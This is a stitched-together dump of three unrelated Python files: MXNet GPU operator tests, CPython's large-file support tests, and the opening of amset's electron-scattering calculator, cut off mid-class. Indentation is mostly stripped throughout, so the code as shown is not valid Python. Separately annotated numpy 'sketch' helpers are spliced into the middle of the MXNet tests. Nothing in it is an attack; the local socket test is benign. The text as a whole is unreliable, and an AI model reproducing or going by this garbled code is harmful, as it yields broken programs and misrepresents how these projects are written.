cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
            # no 100% guarantee with NMS
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
with mx.np_shape(active=True):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c._bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
@pytest.mark.serial
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
pytest.raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
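# In inference mode (train_mode=False above) BatchNorm normalizes with the supplied moving
# statistics rather than batch statistics. A per-channel numpy sketch of that formula
# (ours; eps is an assumed small constant and may differ from the operator's default):
def _batchnorm_inference_sketch(x_np, gamma, beta, moving_mean, moving_var, eps=1e-5):
    shape = (1, -1, 1, 1)  # broadcast the per-channel parameters over N, H, W
    x_hat = (x_np - moving_mean.reshape(shape)) / np.sqrt(moving_var.reshape(shape) + eps)
    return gamma.reshape(shape) * x_hat + beta.reshape(shape)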
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y, gpu_y, atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad, gpu_a.grad, atol = 1e-3, rtol = 1e-3)
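# SoftmaxActivation above applies the standard softmax to each row of the (batch, classes)
# input. A numerically stable numpy reference sketch (ours, not used by the test):
def _softmax_reference_sketch(a_np):
    shifted = a_np - a_np.max(axis=1, keepdims=True)  # subtract the row max for stability
    e = np.exp(shifted)
    return e / e.sum(axis=1, keepdims=True)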
@with_seed()
@pytest.mark.serial
def test_bilinear_sampler_versions():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym1 = mx.sym.BilinearSampler(data=data, grid=grid)
sym2 = mx.sym.BilinearSampler(data=data, grid=grid, cudnn_off=True)
sym3 = mx.sym.BilinearSampler(data=data, grid=grid)
test_cases = [[(1,3,15,16),(1,2,10,10)],
[(1,6,7,16),(1,2,10,4)],
[(1,7,3,16),(1,2,8,11)],
[(1,9,50,50),(1,2,50,50)]]
for item in test_cases:
data_shape, grid_shape = item
# kWriteTo
exe_cpu = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='write')
exe_gpu = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_cudnn = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='write')
exe_list = [exe_cpu, exe_gpu, exe_cudnn]
ref_idx = 0
test_data = np.random.uniform(low=-0.1, high=0.1,size=data_shape).astype(np.float32)
test_grid = np.random.uniform(low=-2, high=2, size=grid_shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
mx.test_utils.assert_almost_equal(exe_list[ref_idx].outputs[0], exe.outputs[0], rtol=1e-3, atol=1e-5)
out_grad = np.random.uniform(low=-0.01, high=0.01,size=data_shape[:2] + grid_shape[2:]).astype(np.float32)
for exe in exe_list:
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
data_grad = exe_list[ref_idx].grad_dict['data'].asnumpy()
grid_grad = exe_list[ref_idx].grad_dict['grid'].asnumpy()
# kAddTo
exe_cpu_addto = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req='add')
exe_gpu_addto = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_cudnn_addto = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req='add')
exe_list = [exe_cpu_addto, exe_gpu_addto, exe_cudnn_addto]
data_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['data'].shape).astype(np.float32)
grid_initial_grad = np.random.normal(size=exe_list[ref_idx].grad_dict['grid'].shape).astype(np.float32)
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.grad_dict['data'][:] = data_initial_grad
exe.grad_dict['grid'][:] = grid_initial_grad
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['data'], data_grad + data_initial_grad, rtol=1e-3, atol=1e-5)
assert_almost_equal(exe_list[ref_idx].grad_dict['grid'], grid_grad + grid_initial_grad, rtol=1e-3, atol=1e-5)
for req_dict in [{'data' : 'null', 'grid' : 'write'}, {'data' : 'write', 'grid' : 'null'}]:
# Mixture of kWriteTo and kNullOp
exe_cpu_mix = sym1._simple_bind(data=data_shape, grid=grid_shape, ctx=mx.cpu(), grad_req=req_dict)
exe_gpu_mix = sym2._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_cudnn_mix = sym3._simple_bind(data=data_shape, grid=grid_shape, ctx=default_context(), grad_req=req_dict)
exe_list = [exe_cpu_mix, exe_gpu_mix, exe_cudnn_mix]
for exe in exe_list:
exe.arg_dict['data'][:] = test_data
exe.arg_dict['grid'][:] = test_grid
exe.forward(is_train=True)
exe.backward(mx.nd.array(out_grad))
                if req_dict['data'] == 'write':
assert_almost_equal(exe.grad_dict['data'], exe_list[ref_idx].grad_dict['data'], rtol=1e-3, atol=1e-5)
                if req_dict['grid'] == 'write':
assert_almost_equal(exe.grad_dict['grid'], exe_list[ref_idx].grad_dict['grid'], rtol=1e-3, atol=1e-5)
# isolated execution bulking test function to be invoked with different env var settings
def _test_bulking_in_process(seed, time_per_iteration):
data_shape = (10,)
num_ops = 1000
num_iterations = 20
ctx = default_context()
# build symbol
X = mx.sym.Variable('X')
sym = mx.sym.flip(X, axis=0)
for _ in range(num_ops-1):
sym = mx.sym.flip(sym, axis=0)
x = mx.ndarray.zeros(data_shape)
dx = mx.ndarray.zeros(data_shape)
dy = mx.ndarray.ones(data_shape)
exe = sym._bind(ctx=ctx, args=[x], args_grad = {'X':dx})
# time a number of forward() and backward() executions after some warm-up iterations
warmups = 1
for i in range(num_iterations+warmups):
if i == warmups:
start = time.time()
exe.forward(is_train=True)
exe.backward(dy)
dx.wait_to_read()
time_per_iteration.value = (time.time() - start) / num_iterations
@with_seed()
@pytest.mark.skip(reason='skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/16517')
def test_bulking_operator_gpu():
_test_bulking(_test_bulking_in_process)
@pytest.mark.skip(reason='skipping temporarily, tracked by https://github.com/apache/incubator-mxnet/issues/14970')
def test_bulking():
# test case format: (max_fwd_segment_size, max_bwd_segment_size, enable_bulking_in_training)
test_cases = [(0,0,True), (1,1,True), (15,15,False), (15,0,True), (0,15,True), (15,15,True)]
times = {}
times_str = ''
for seg_sizes in test_cases:
# Create shared variable to return measured time from test process
time_per_iteration = mp.Manager().Value('d', 0.0)
if not run_in_spawned_process(_test_bulking_in_process,
{'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_FWD' : seg_sizes[0],
'MXNET_EXEC_BULK_EXEC_MAX_NODE_TRAIN_BWD' : seg_sizes[1],
'MXNET_EXEC_BULK_EXEC_TRAIN' : seg_sizes[2]},
time_per_iteration):
# skip test since the python version can't run it properly. Warning msg was logged.
return
times[seg_sizes] = time_per_iteration.value
times_str += \
'\n runtime of (fwd,bwd,enable) op seg setting ({},{},{}) =\t{:.1f} msec'.format(
seg_sizes[0], seg_sizes[1], seg_sizes[2], 1000.0 * times[seg_sizes])
fastest_non_bulked_time = min(times[(0,0,True)], times[(1,1,True)], times[(15,15,False)])
slowest_half_bulked_time = max(times[(0,15,True)], times[(15,0,True)])
fastest_half_bulked_time = min(times[(0,15,True)], times[(15,0,True)])
fully_bulked_time = times[(15,15,True)]
print(times_str)
# Non-bulked times[0,0,True], times[1,1,True] and times[15,15,False] should be about the same,
# slower than both half-bulked times[0,15,True] and times[15,0,True]
assert slowest_half_bulked_time < fastest_non_bulked_time, \
'A half-bulked exec time is slower than the non-bulked time by {} secs! {}' \
.format(slowest_half_bulked_time - fastest_non_bulked_time, times_str)
# The fully bulked times[15,15,True] should be faster than both half-bulked runs
assert fully_bulked_time < fastest_half_bulked_time, \
'The fully-bulked exec time is slower than a half-bulked time by {} secs! {}' \
.format(fully_bulked_time - fastest_half_bulked_time, times_str)
@with_seed()
@pytest.mark.serial
def test_allclose_function_gpu():
allclose_function([mx.cpu(), mx.gpu(0)])
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
def math_log(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.log(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.log(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_erf(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.erf(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.erf(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def math_square(shape, dtype, check_value):
np_x = np.random.rand(*tuple(shape))
x = mx.nd.array(np_x, dtype=dtype)
y = mx.nd.square(data=x)
if check_value:
x_ = x.as_in_context(mx.cpu())
y_ = mx.nd.square(data=x_)
assert_almost_equal(y.asnumpy(), y_.asnumpy())
def run_math(op, shape, dtype="float32", check_value=True):
run_num = 10
for i in range(run_num):
if op == 'log':
math_log(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'erf':
math_erf(shape=shape, dtype=dtype, check_value=check_value)
elif op == 'square':
math_square(shape=shape, dtype=dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_math():
ops = ['log', 'erf', 'square']
check_value= True
shape_lst = [[1000], [100,1000], [10,100,100], [10,100,100,100]]
dtypes = ["float32", "float64"]
for shape in shape_lst:
for dtype in dtypes:
for op in ops:
run_math(op, shape, dtype, check_value=check_value)
@with_seed()
@pytest.mark.serial
def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z._simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
|
test_largefile.py
|
"""Test largefile support on system where this makes sense.
"""
import os
import stat
import sys
import unittest
import socket
import shutil
import threading
from test.support import TESTFN, requires, unlink, bigmemtest
from test.support import SHORT_TIMEOUT
from test.support import socket_helper
import io # C implementation of io
import _pyio as pyio # Python implementation of io
# size of file to create (>2 GiB; 2 GiB == 2,147,483,648 bytes)
size = 2_500_000_000
TESTFN2 = TESTFN + '2'
class LargeFileTest:
def setUp(self):
if os.path.exists(TESTFN):
mode = 'r+b'
else:
mode = 'w+b'
with self.open(TESTFN, mode) as f:
current_size = os.fstat(f.fileno())[stat.ST_SIZE]
if current_size == size+1:
return
if current_size == 0:
f.write(b'z')
f.seek(0)
f.seek(size)
f.write(b'a')
f.flush()
self.assertEqual(os.fstat(f.fileno())[stat.ST_SIZE], size+1)
@classmethod
def tearDownClass(cls):
with cls.open(TESTFN, 'wb'):
pass
if not os.stat(TESTFN)[stat.ST_SIZE] == 0:
raise cls.failureException('File was not truncated by opening '
'with mode "wb"')
unlink(TESTFN2)
class TestFileMethods(LargeFileTest):
"""Test that each file function works as expected for large
(i.e. > 2 GiB) files.
"""
    # _pyio.FileIO.readall() uses a temporary bytearray which is then cast to
    # bytes, so memuse=2 is needed
@bigmemtest(size=size, memuse=2, dry_run=False)
def test_large_read(self, _size):
# bpo-24658: Test that a read greater than 2GB does not fail.
with self.open(TESTFN, "rb") as f:
self.assertEqual(len(f.read()), size + 1)
self.assertEqual(f.tell(), size + 1)
def test_osstat(self):
self.assertEqual(os.stat(TESTFN)[stat.ST_SIZE], size+1)
def test_seek_read(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
f.seek(0)
self.assertEqual(f.tell(), 0)
f.seek(0, 0)
self.assertEqual(f.tell(), 0)
f.seek(42)
self.assertEqual(f.tell(), 42)
f.seek(42, 0)
self.assertEqual(f.tell(), 42)
f.seek(42, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 1)
self.assertEqual(f.tell(), 84)
f.seek(0, 2) # seek from the end
self.assertEqual(f.tell(), size + 1 + 0)
f.seek(-10, 2)
self.assertEqual(f.tell(), size + 1 - 10)
f.seek(-size-1, 2)
self.assertEqual(f.tell(), 0)
f.seek(size)
self.assertEqual(f.tell(), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
f.seek(-size-1, 1)
self.assertEqual(f.read(1), b'z')
self.assertEqual(f.tell(), 1)
def test_lseek(self):
with self.open(TESTFN, 'rb') as f:
self.assertEqual(os.lseek(f.fileno(), 0, 0), 0)
self.assertEqual(os.lseek(f.fileno(), 42, 0), 42)
self.assertEqual(os.lseek(f.fileno(), 42, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 1), 84)
self.assertEqual(os.lseek(f.fileno(), 0, 2), size+1+0)
self.assertEqual(os.lseek(f.fileno(), -10, 2), size+1-10)
self.assertEqual(os.lseek(f.fileno(), -size-1, 2), 0)
self.assertEqual(os.lseek(f.fileno(), size, 0), size)
# the 'a' that was written at the end of file above
self.assertEqual(f.read(1), b'a')
def test_truncate(self):
with self.open(TESTFN, 'r+b') as f:
if not hasattr(f, 'truncate'):
raise unittest.SkipTest("open().truncate() not available "
"on this system")
f.seek(0, 2)
# else we've lost track of the true size
self.assertEqual(f.tell(), size+1)
# Cut it back via seek + truncate with no argument.
newsize = size - 10
f.seek(newsize)
f.truncate()
self.assertEqual(f.tell(), newsize) # else pointer moved
f.seek(0, 2)
self.assertEqual(f.tell(), newsize) # else wasn't truncated
# Ensure that truncate(smaller than true size) shrinks
# the file.
newsize -= 1
f.seek(42)
f.truncate(newsize)
self.assertEqual(f.tell(), 42)
f.seek(0, 2)
self.assertEqual(f.tell(), newsize)
            # XXX truncate(larger than true size) is ill-defined
            # across platforms; cut it waaaaay back
f.seek(0)
f.truncate(1)
self.assertEqual(f.tell(), 0) # else pointer moved
f.seek(0)
self.assertEqual(len(f.read()), 1) # else wasn't truncated
def test_seekable(self):
# Issue #5016; seekable() can return False when the current position
# is negative when truncated to an int.
for pos in (2**31-1, 2**31, 2**31+1):
with self.open(TESTFN, 'rb') as f:
f.seek(pos)
self.assertTrue(f.seekable())
def skip_no_disk_space(path, required):
def decorator(fun):
def wrapper(*args, **kwargs):
if shutil.disk_usage(os.path.realpath(path)).free < required:
hsize = int(required / 1024 / 1024)
raise unittest.SkipTest(
f"required {hsize} MiB of free disk space")
return fun(*args, **kwargs)
return wrapper
return decorator
class TestCopyfile(LargeFileTest, unittest.TestCase):
open = staticmethod(io.open)
# Exact required disk space would be (size * 2), but let's give it a
# bit more tolerance.
@skip_no_disk_space(TESTFN, size * 2.5)
def test_it(self):
# Internally shutil.copyfile() can use "fast copy" methods like
# os.sendfile().
size = os.path.getsize(TESTFN)
shutil.copyfile(TESTFN, TESTFN2)
self.assertEqual(os.path.getsize(TESTFN2), size)
with open(TESTFN2, 'rb') as f:
self.assertEqual(f.read(5), b'z\x00\x00\x00\x00')
f.seek(size - 5)
self.assertEqual(f.read(), b'\x00\x00\x00\x00a')
@unittest.skipIf(not hasattr(os, 'sendfile'), 'sendfile not supported')
class TestSocketSendfile(LargeFileTest, unittest.TestCase):
open = staticmethod(io.open)
timeout = SHORT_TIMEOUT
def setUp(self):
super().setUp()
self.thread = None
def tearDown(self):
super().tearDown()
if self.thread is not None:
self.thread.join(self.timeout)
self.thread = None
def tcp_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
conn.settimeout(self.timeout)
with conn, open(TESTFN2, 'wb') as f:
event.wait(self.timeout)
while True:
chunk = conn.recv(65536)
if not chunk:
return
f.write(chunk)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
# Exact required disk space would be (size * 2), but let's give it a
# bit more tolerance.
@skip_no_disk_space(TESTFN, size * 2.5)
def test_it(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.tcp_server(sock)
with socket.create_connection(("127.0.0.1", port)) as client:
with open(TESTFN, 'rb') as f:
client.sendfile(f)
self.tearDown()
size = os.path.getsize(TESTFN)
self.assertEqual(os.path.getsize(TESTFN2), size)
with open(TESTFN2, 'rb') as f:
self.assertEqual(f.read(5), b'z\x00\x00\x00\x00')
f.seek(size - 5)
self.assertEqual(f.read(), b'\x00\x00\x00\x00a')
def setUpModule():
try:
import signal
# The default handler for SIGXFSZ is to abort the process.
# By ignoring it, system calls exceeding the file size resource
# limit will raise OSError instead of crashing the interpreter.
signal.signal(signal.SIGXFSZ, signal.SIG_IGN)
except (ImportError, AttributeError):
pass
# On Windows and Mac OSX this test consumes large resources; It
# takes a long time to build the >2 GiB file and takes >2 GiB of disk
# space therefore the resource must be enabled to run this test.
# If not, nothing after this line stanza will be executed.
if sys.platform[:3] == 'win' or sys.platform == 'darwin':
requires('largefile',
'test requires %s bytes and a long time to run' % str(size))
else:
# Only run if the current filesystem supports large files.
# (Skip this test on Windows, since we now always support
# large files.)
f = open(TESTFN, 'wb', buffering=0)
try:
# 2**31 == 2147483648
f.seek(2147483649)
# Seeking is not enough of a test: you must write and flush, too!
f.write(b'x')
f.flush()
except (OSError, OverflowError):
raise unittest.SkipTest("filesystem does not have "
"largefile support")
finally:
f.close()
unlink(TESTFN)
class CLargeFileTest(TestFileMethods, unittest.TestCase):
open = staticmethod(io.open)
class PyLargeFileTest(TestFileMethods, unittest.TestCase):
open = staticmethod(pyio.open)
def tearDownModule():
unlink(TESTFN)
unlink(TESTFN2)
if __name__ == '__main__':
unittest.main()
|
calculate.py
|
"""
This module implements methods to calculate electron scattering.
"""
import logging
import multiprocessing
import time
import traceback
from multiprocessing import cpu_count
from queue import Empty
from typing import Any, Dict, List, Optional, Union
import numba
import numpy as np
import quadpy
from pymatgen.electronic_structure.core import Spin
from pymatgen.util.coord import pbc_diff
from scipy.interpolate import griddata
from amset.constants import (
boltzmann_au,
defaults,
ev_to_hartree,
hbar,
small_val,
spin_name,
)
from amset.core.data import AmsetData
from amset.electronic_structure.fd import fd
from amset.electronic_structure.kpoints import kpoints_to_first_bz
from amset.electronic_structure.tetrahedron import (
TetrahedralBandStructure,
get_cross_section_values,
get_projected_intersections,
)
from amset.interpolation.momentum import MRTACalculator
from amset.interpolation.projections import ProjectionOverlapCalculator
from amset.interpolation.wavefunction import WavefunctionOverlapCalculator
from amset.log import log_list, log_time_taken
from amset.scattering.basic import AbstractBasicScattering
from amset.scattering.elastic import (
AbstractElasticScattering,
AcousticDeformationPotentialScattering,
)
from amset.scattering.inelastic import AbstractInelasticScattering
from amset.util import (
create_shared_dict_array,
dict_array_from_buffer,
get_progress_bar,
)
__author__ = "Alex Ganose"
__maintainer__ = "Alex Ganose"
__email__ = "aganose@lbl.gov"
logger = logging.getLogger(__name__)
_all_scatterers: Union = (
AbstractElasticScattering.__subclasses__()
+ AbstractInelasticScattering.__subclasses__()
+ AbstractBasicScattering.__subclasses__()
)
_scattering_mechanisms = {m.name: m for m in _all_scatterers}
basic_scatterers = [i.name for i in AbstractBasicScattering.__subclasses__()]
ni = {
"high": {
"triangle": quadpy.t2.schemes["xiao_gimbutas_50"](),
"quad": quadpy.c2.schemes["sommariva_55"](),
},
"medium": {
"triangle": quadpy.t2.schemes["xiao_gimbutas_06"](),
"quad": quadpy.c2.schemes["sommariva_06"](),
},
"low": {
"triangle": quadpy.t2.schemes["centroid"](),
"quad": quadpy.c2.schemes["dunavant_00"](),
},
}
# ni = {
# "high": {
# "triangle": quadpy.t2.schemes["centroid"](),
# "quad": quadpy.c2.schemes["dunavant_00"]()
# },
# "medium": {
# "triangle": quadpy.t2.schemes["centroid"](),
# "quad": quadpy.c2.schemes["dunavant_00"]()
# },
# "low": {
# "triangle": quadpy.t2.schemes["centroid"](),
# "quad": quadpy.c2.schemes["dunavant_00"]()
# },
# }
class ScatteringCalculator:
def __init__(
self,
settings: Dict[str, float],
amset_data: AmsetData,
cutoff_pad: float,
scattering_type: Union[str, List[str], float] = "auto",
nworkers: int = defaults["nworkers"],
progress_bar: bool = defaults["print_log"],
cache_wavefunction: bool = defaults["cache_wavefunction"],
):
if amset_data.temperatures is None or amset_data.doping is None:
raise RuntimeError(
"AmsetData doesn't contain doping levels or temperatures"
)
self.scattering_type = scattering_type
self.settings = settings
self.nworkers = nworkers if nworkers != -1 else cpu_count()
self.scatterers = self.get_scatterers(scattering_type, settings, amset_data)
self.amset_data = amset_data
self.progress_bar = progress_bar
self.cache_wavefunction = cache_wavefunction
buf = 0.05 * ev_to_hartree
if self.amset_data.fd_cutoffs:
self.scattering_energy_cutoffs = (
self.amset_data.fd_cutoffs[0] - buf,
self.amset_data.fd_cutoffs[1] + buf,
)
else:
self.scattering_energy_cutoffs = (
min(self.amset_data.dos.energies) - buf,
max(self.amset_data.dos.energies) + buf,
)
self._coeffs = None
self._coeffs_mapping = None
# if only basic scatterers then no need to cache overlaps
self._basic_only = (
len(self.elastic_scatterers) + len(self.inelastic_scatterers) == 0
)
if (
isinstance(self.amset_data.overlap_calculator, ProjectionOverlapCalculator)
and cache_wavefunction
):
logger.info(
"Caching wavefunction not supported with orbital projection "
"overlaps. Setting cache_wavefunction to False."
)
elif cache_wavefunction and not self._basic_only:
self._coeffs = {}
self._coeffs_mapping = {}
            # precompute the coefficients we will need for calculating overlaps
# could do this on the fly but caching will really speed things up.
# we need to interpolate as the wavefunction coefficients were calculated on
# a coarse mesh but we calculate the orbital overlap on a fine mesh.
tbs = self.amset_data.tetrahedral_band_structure
for spin in amset_data.spins:
spin_b_idxs = []
spin_k_idxs = []
for b_idx, b_energies in enumerate(self.amset_data.energies[spin]):
# find all k-points that fall inside Fermi cutoffs
k_idxs = np.where(
(b_energies > self.scattering_energy_cutoffs[0] - cutoff_pad)
& (b_energies < self.scattering_energy_cutoffs[1] + cutoff_pad)
)[0]
# find k-points connected to the k-points inside Fermi cutoffs
k_idxs = tbs.get_connected_kpoints(k_idxs)
spin_k_idxs.extend(k_idxs.tolist())
spin_b_idxs.extend([b_idx] * len(k_idxs))
# calculate the coefficients for all bands and k-point simultaneously
try:
self._coeffs[
spin
] = self.amset_data.overlap_calculator.get_coefficients(
spin, spin_b_idxs, self.amset_data.kpoints[spin_k_idxs]
)
# because we are only storing the coefficients for the
# band/k-points we want, we need a way of mapping from the original
# band/k-point indices to the reduced indices. I.e., it allows us to
# get the coefficients for band b_idx, and k-point k_idx using:
# self._coeffs[spin][self._coeffs_mapping[b_idx, k_idx]]
                    # use a default value of 100000 as this way it will throw
                    # an error if we don't precache the correct values
mapping = np.full_like(self.amset_data.energies[spin], 100000)
mapping[spin_b_idxs, spin_k_idxs] = np.arange(len(spin_b_idxs))
self._coeffs_mapping[spin] = mapping.astype(int)
except MemoryError:
logger.warning(
"Memory requirements too large to cache wavefunction "
"coefficients. Setting cache_wavefunction to False"
)
self._coeffs = None
self._coeffs_mapping = None
break
self.in_queue = None
self.out_queue = None
self.workers = None
self.initialize_workers()
def initialize_workers(self):
if self._basic_only:
return
logger.info(f"Forking {self.nworkers} processes to calculate scattering")
t0 = time.perf_counter()
if isinstance(self.amset_data.overlap_calculator, ProjectionOverlapCalculator):
overlap_type = "projection"
else:
overlap_type = "wavefunction"
if self._coeffs is None:
coeffs_buffer = None
coeffs_mapping_buffer = None
else:
coeffs_buffer, self._coeffs = create_shared_dict_array(
self._coeffs, return_shared_data=True
)
coeffs_mapping_buffer, self._coeffs_mapping = create_shared_dict_array(
self._coeffs_mapping, return_shared_data=True
)
amset_data_min = _AmsetDataMin.from_amset_data(self.amset_data)
amset_data_min_reference = amset_data_min.to_reference()
# deformation potential is a large tensor that should be put into shared memory
elastic_scatterers = [
s.to_reference()
if isinstance(s, AcousticDeformationPotentialScattering)
else s
for s in self.elastic_scatterers
]
ctx = multiprocessing.get_context("spawn")
self.in_queue = ctx.Queue()
self.out_queue = ctx.Queue()
args = (
self.amset_data.tetrahedral_band_structure.to_reference(),
overlap_type,
self.amset_data.overlap_calculator.to_reference(),
self.amset_data.mrta_calculator.to_reference(),
elastic_scatterers,
self.inelastic_scatterers,
amset_data_min_reference,
coeffs_buffer,
coeffs_mapping_buffer,
self.in_queue,
self.out_queue,
)
self.workers = []
for _ in range(self.nworkers):
self.workers.append(ctx.Process(target=scattering_worker, args=args))
iterable = self.workers
if self.progress_bar:
iterable = get_progress_bar(self.workers, desc="workers")
for w in iterable:
w.start()
log_time_taken(t0)
return self.workers
def terminate_workers(self):
# The "None"s at the end of the queue signals to the workers that there are
# no more jobs left and they must therefore exit.
if self.workers is not None:
for i in range(self.nworkers):
self.in_queue.put(None)
for w in self.workers:
w.terminate()
w.join(0)
self.in_queue.close()
self.out_queue.close()
self.workers = None
@property
def basic_scatterers(self):
return [s for s in self.scatterers if isinstance(s, AbstractBasicScattering)]
@property
def inelastic_scatterers(self):
return [
s for s in self.scatterers if isinstance(s, AbstractInelasticScattering)
]
@property
def elastic_scatterers(self):
